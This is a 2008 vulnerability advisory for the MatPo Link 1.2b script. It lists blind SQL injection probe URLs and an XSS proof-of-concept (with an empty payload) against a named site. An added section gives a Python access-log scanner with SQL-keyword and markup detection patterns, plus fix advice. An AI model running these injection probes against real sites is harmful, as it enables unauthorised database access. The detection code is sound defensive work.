
# Title : MatPo Link 1.2b (Blind SQL Injection/XSS) Multiple Vulnerabilities
# Published : 2008-11-03
# Author : Hakxer


###########################################################################
        EgY Coders Vulnerability Research TM

# [~] Discovered by : Hakxer
# [~] Type Gap : Blind SQL Injection / XSS
# [~] Script : MatPo Link 1.2b
# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
##########################################################################

|| Blind SQL Injection ||
 PoC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL]
  Exploit:
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=1 True
  
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False
		
|| Cross Site Scripting ||
PoC:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS]
Exploit:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=

#  Proud To be a Muslim #
#_=END=_#

# www.Syue.com [2008-11-03]
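
Added example (not part of the original advisory and not the project's code): a log check that flags the two request shapes shown above, a non-integer `id` and markup characters in `thema` sent to view.php. The access-log format, the finding labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an access-log entry: "GET /path?query HTTP/1.x"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL fragments typical of boolean-blind probing of a numeric parameter.
SQL_TOKENS = re.compile(r"\b(?:and|or|union|select|substring)\b|@@|--|/\*", re.I)
# Characters that let a reflected value break out into HTML markup.
MARKUP = re.compile(r"[<>\"']")

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [03/Nov/2008:10:00:01 +0000] "GET /linkliste/view.php?id=12 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [03/Nov/2008:10:00:05 +0000] "GET /linkliste/view.php?id=12+and+1=0 HTTP/1.1" 200 812',
    '192.0.2.11 - - [03/Nov/2008:10:00:06 +0000] "GET /linkliste/view.php?id=12+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '192.0.2.12 - - [03/Nov/2008:10:01:00 +0000] "GET /linkliste/view.php?id=12&thema=%3Cb%3Etest%3C/b%3E HTTP/1.1" 200 5200',
]

def classify(log_line, script="view.php"):
    """Return a sorted list of findings for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/" + script):
        return []
    # parse_qs URL-decodes each value and turns '+' into a space.
    params = parse_qs(url.query, keep_blank_values=True)
    findings = set()
    for value in params.get("id", []):
        if not re.fullmatch(r"[0-9]+", value):
            findings.add("id-not-integer")
            if SQL_TOKENS.search(value):
                findings.add("sqli-probe")
    for value in params.get("thema", []):
        if MARKUP.search(value):
            findings.add("xss-probe")
    return sorted(findings)

def scan(lines):
    """Return (client address, findings) for every line that has findings."""
    results = [(line.split()[0], classify(line)) for line in lines]
    return [(ip, found) for ip, found in results if found]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE):
        print(ip, found)
```

The same two rules describe the server-side fix: accept `id` only as an integer before it reaches the query, and HTML-encode `thema` wherever it is echoed back.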